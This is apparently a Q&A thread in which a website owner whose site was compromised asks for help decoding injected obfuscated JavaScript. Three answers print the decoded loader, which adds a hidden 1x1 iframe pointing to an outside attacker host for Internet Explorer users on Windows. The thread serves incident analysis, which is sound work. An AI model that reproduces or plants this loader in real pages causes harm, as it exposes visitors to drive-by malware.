注入网站的JavaScript代码：你能帮我解密一下吗？

Question

Recently I was the victim of a web attack, which seemed to take various PHP server vars, then forward them to an attackers website. (IPs of visitor/website, referrer, useragent etc, etc.) Then it would get the file it sent the URL request to, and echo() it to source.

I know you get MANY of these sort of requests (Mostly as poor man XSS attempts), but I would really appreciate some help here, as I don't have much experience with JS. It took me several hours of PHP unscrambling to figure at what it did, and after passing some dummy info, it returned this (which was being echoed into source)

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|25u|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|500|asso|navigator|com|showthread|php|72291731'.split('|'),0,{}))

Thank you for your time and patience with this matter.

Answer 1

Simply replace eval with alert .

It yields the following:

function MakeFrameEx(){
    element=document.getElementById('yahoo_api');
    if(!element){
        var el=document.createElement('iframe');
        document.body.appendChild(el);
        el.id='yahoo_api';
        el.style.width='1px';
        el.style.height='1px';
        el.style.display='none';
        el.src='http://asso.25u.com/showthread.php?t=72291731'
    }
}

var ua=navigator.userAgent.toLowerCase();

if(((ua.indexOf("msie")!=-1
    &&ua.indexOf("opera")==-1
    &&ua.indexOf("webtv")==-1))
    &&ua.indexOf("windows")!=-1)
{
    var t=setTimeout("MakeFrameEx()",500);
}

After doing the alert() CTRL+C the dialog to get the contents, then use a JS Beautifier to get some readable code.

---

Also note that for some browsers, like Firefox, there are plugins to do this automatically. Some browsers even does this automatically (MSIE).

Answer 2

This was some obfuscated code. I deobfuscated it and this is what it does:

function MakeFrameEx() {
element = document.getElementById('yahoo_api');
if (!element) {
    var el = document.createElement('iframe');
    document.body.appendChild(el);
    el.id = 'yahoo_api';
    el.style.width = '1px';
    el.style.height = '1px';
    el.style.display = 'none';
    el.src = 'http://asso.25u.com/showthread.php?t=72291731'
    }
}
var ua = navigator.userAgent.toLowerCase();
if (((ua.indexOf("msie") != -1 && ua.indexOf("opera") == -1 && ua
    .indexOf("webtv") == -1))
    && ua.indexOf("windows") != -1) {
var t = setTimeout("MakeFrameEx()", 500)
}

Answer 3

Here is the deobfuscated JavaScript code:

 function MakeFrameEx()
 {
   element=document.getElementById('yahoo_api');
   if(!element)
   {
     var el=document.createElement('iframe');
     document.body.appendChild(el);
     el.id='yahoo_api';
     el.style.width='1px';
     el.style.height='1px';
     el.style.display='none';
     el.src='http://asso.25u.com/showthread.php?t=72291731'
   }
 }
 var ua=navigator.userAgent.toLowerCase();
 if(((ua.indexOf("msie")!=-1&&ua.indexOf("opera")==-1&&ua.indexOf("webtv")==-1))&&ua.indexOf("windows")!=-1)
 {
 var t=setTimeout("MakeFrameEx()",500)}